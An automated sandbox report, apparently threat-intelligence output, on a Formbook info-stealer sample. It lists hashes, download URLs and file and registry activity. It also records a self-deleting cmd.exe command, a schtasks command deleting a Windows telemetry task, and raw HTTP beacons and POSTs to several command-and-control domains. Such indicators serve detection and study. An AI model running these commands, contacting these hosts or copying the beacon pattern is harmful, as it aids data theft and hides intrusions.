MalScore: 100/100
MalFamily: Formbook

fairdoc.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 49/66
File details
File type: PE32 executable (GUI) Intel 80386, for MS Windows
File size: 167.50 KB (171520 bytes)
Compile time: 2006-07-30 04:18:22
MD5: 316d90aa07e5282ce765f212ab26c7f5
SHA1: 65e4dee5aa409f44657a3f3cb3bf99fd5846fe1c
SHA256: 96920ba7e70b2b945030b53fc09d6b28eee4c3b77fdb1c09faf60698e080435f
Sections 1 .text
Anti Virtual Machine 1 VMCheck.dll
First submission: 2018-11-13 00:09:04
Last submission: 2018-11-23 10:30:03
Filename detected: - fairdoc.exe (4)
URL file hosting
hXXp://canoninstant.com/music/fairdoc.exe
hXXp://canoninstant.com/Carlitoma/fairdoc.exe
hXXp://canoninstant.com/carlitos/fairdoc.exe
hXXp://canoninstant.com/LOVER/fairdoc.exe
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-11-12 20:00:33 [49/66] VirusTotal
PE Sections 1 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x1000 0x28a30 166912 1b5ae1990bcd400b0ad61201bc53ebb2 613607c4b47bff7ad1aeb14c3f61ffc77dc5648b
Meta Info
No Meta found in this file
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
Borland Delphi 3.0 (???)
File found
No file name detected
IP Found
No IP detected
URL(s)
No URL found
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-11-13 00:04:33 2018-11-13 00:07:33 180

12 Behaviors detected by system signatures

11 Summary items with data

Files


Read Files


Write Files

C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\K3582CR8\K35logim.jpeg
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\Temp\fwtsqmfile01.sqm
\Device\Ndis
C:\Windows\sysnative\wbem\Performance\WmiApRpl_new.h

Delete Files

C:\Users\Seven01\AppData\Local\Temp\fairdoc.exe
C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader

Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\AppId
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\WmiPrvSE.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\WMI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\WMI
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\WMIADAP.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ThrottleDrege

Read Keys


Write Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastEventTimeStamp

Delete Keys

Nothing to display

Mutexes

Local\_!MSFTHISTORY!_
Local\c:!users!seven01!appdata!local!microsoft!windows!temporary internet files!content.ie5!
Local\c:!users!seven01!appdata!roaming!microsoft!windows!cookies!
Local\c:!users!seven01!appdata!local!microsoft!windows!history!history.ie5!
Global\SQMWindowsConsolidator
Global\ADAP_WMI_ENTRY
Global\RefreshRA_Mutex
Global\RefreshRA_Mutex_Lib
Global\RefreshRA_Mutex_Flag

Resolved APIs

cryptbase.dll.SystemFunction036
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
mlang.dll.#112
wininet.dll.FindFirstUrlCacheEntryA
kernel32.dll.SetFileInformationByHandle
shell32.dll.SHGetFolderPathW
urlmon.dll.CreateUri
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.AcquireSRWLockShared
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.ReleaseSRWLockShared
wininet.dll.FindNextUrlCacheEntryA
wininet.dll.FindCloseUrlCache
oleaut32.dll.#500
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.#10
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
sspicli.dll.GetUserNameExW
pcwum.dll.PerfDeleteInstance
pcwum.dll.PerfStopProvider
cryptsp.dll.CryptReleaseContext
wbemcore.dll.Reinitialize
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.LocaleNameToLCID
kernel32.dll.GetLocaleInfoEx
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetSystemDefaultLocaleName
fastprox.dll.DllGetClassObject
fastprox.dll.DllCanUnloadNow
kernel32.dll.RegOpenKeyExW
psapi.dll.EnumProcesses
psapi.dll.EnumProcessModules
psapi.dll.GetModuleBaseNameW
ntdll.dll.NtQuerySystemInformation
user32.dll.GetLastInputInfo

Execute Commands

C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Seven01\AppData\Local\Temp\fairdoc.exe"
C:\Windows\system32\lsass.exe
C:\Windows\System32\wsqmcons.exe
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R

Started Services

VaultSvc

Created Services

Nothing to display

10 HTTP Request(s) detected

http://www.ohtgfd.men/hx312/?qR-LpBOP=koELi7gRf66ML+Q5UsimmntVjCMhL5KzkLyMM1fn8YrLn8smfh4PR1x+GryCV13HGylSYMNx&SVj0xL=yj94pdThzhv
  • Hostname: www.ohtgfd.men
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx312/?qR-LpBOP=koELi7gRf66ML+Q5UsimmntVjCMhL5KzkLyMM1fn8YrLn8smfh4PR1x+GryCV13HGylSYMNx&SVj0xL=yj94pdThzhv HTTP/1.1
Host: www.ohtgfd.men
Connection: close


http://www.pabwallet.com/hx312/?qR-LpBOP=XKh1BURqDBXsyccA/k0r0qTDTSoV0lkeie7qs+TU9Nt5Pkq2eKhIkNGwLiJ201k0OWTfqU7F&SVj0xL=yj94pdThzhv
  • Hostname: www.pabwallet.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx312/?qR-LpBOP=XKh1BURqDBXsyccA/k0r0qTDTSoV0lkeie7qs+TU9Nt5Pkq2eKhIkNGwLiJ201k0OWTfqU7F&SVj0xL=yj94pdThzhv HTTP/1.1
Host: www.pabwallet.com
Connection: close


http://www.pabwallet.com/hx312/
  • Hostname: www.pabwallet.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.pabwallet.com
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.pabwallet.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.pabwallet.com/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.pabwallet.com/hx312/
  • Hostname: www.pabwallet.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.pabwallet.com
Connection: close
Content-Length: 57170
Cache-Control: no-cache
Origin: http://www.pabwallet.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.pabwallet.com/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.dancestudiodirector.com/hx312/?qR-LpBOP=Y5pvVCX7OX9eDMScDGEH4uUuC0xa60qK3FLL9C+LAzyQExAF4hhrJQAk/VQzsXlu2CpBJvya&SVj0xL=yj94pdThzhv
  • Hostname: www.dancestudiodirector.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx312/?qR-LpBOP=Y5pvVCX7OX9eDMScDGEH4uUuC0xa60qK3FLL9C+LAzyQExAF4hhrJQAk/VQzsXlu2CpBJvya&SVj0xL=yj94pdThzhv HTTP/1.1
Host: www.dancestudiodirector.com
Connection: close


http://www.dancestudiodirector.com/hx312/
  • Hostname: www.dancestudiodirector.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.dancestudiodirector.com
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.dancestudiodirector.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dancestudiodirector.com/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.dancestudiodirector.com/hx312/
  • Hostname: www.dancestudiodirector.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.dancestudiodirector.com
Connection: close
Content-Length: 57170
Cache-Control: no-cache
Origin: http://www.dancestudiodirector.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dancestudiodirector.com/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.cityforliving.net/hx312/?qR-LpBOP=wgM2NFuiCWCG9LUJ95rOA3Ky7YFHBPCpFPEoHCuHM8tOH0E4ZE+YuIy8M6EtnHvqUx5LWU5v&SVj0xL=yj94pdThzhv
  • Hostname: www.cityforliving.net
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx312/?qR-LpBOP=wgM2NFuiCWCG9LUJ95rOA3Ky7YFHBPCpFPEoHCuHM8tOH0E4ZE+YuIy8M6EtnHvqUx5LWU5v&SVj0xL=yj94pdThzhv HTTP/1.1
Host: www.cityforliving.net
Connection: close


http://www.cityforliving.net/hx312/
  • Hostname: www.cityforliving.net
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.cityforliving.net
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.cityforliving.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cityforliving.net/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.cityforliving.net/hx312/
  • Hostname: www.cityforliving.net
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.cityforliving.net
Connection: close
Content-Length: 57170
Cache-Control: no-cache
Origin: http://www.cityforliving.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cityforliving.net/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


#infosec #automation

TheSystem Itself @ 2018-11-13 00:09:20

Detected family: #Formbook

TheSystem Itself @ 2018-11-13 00:14:03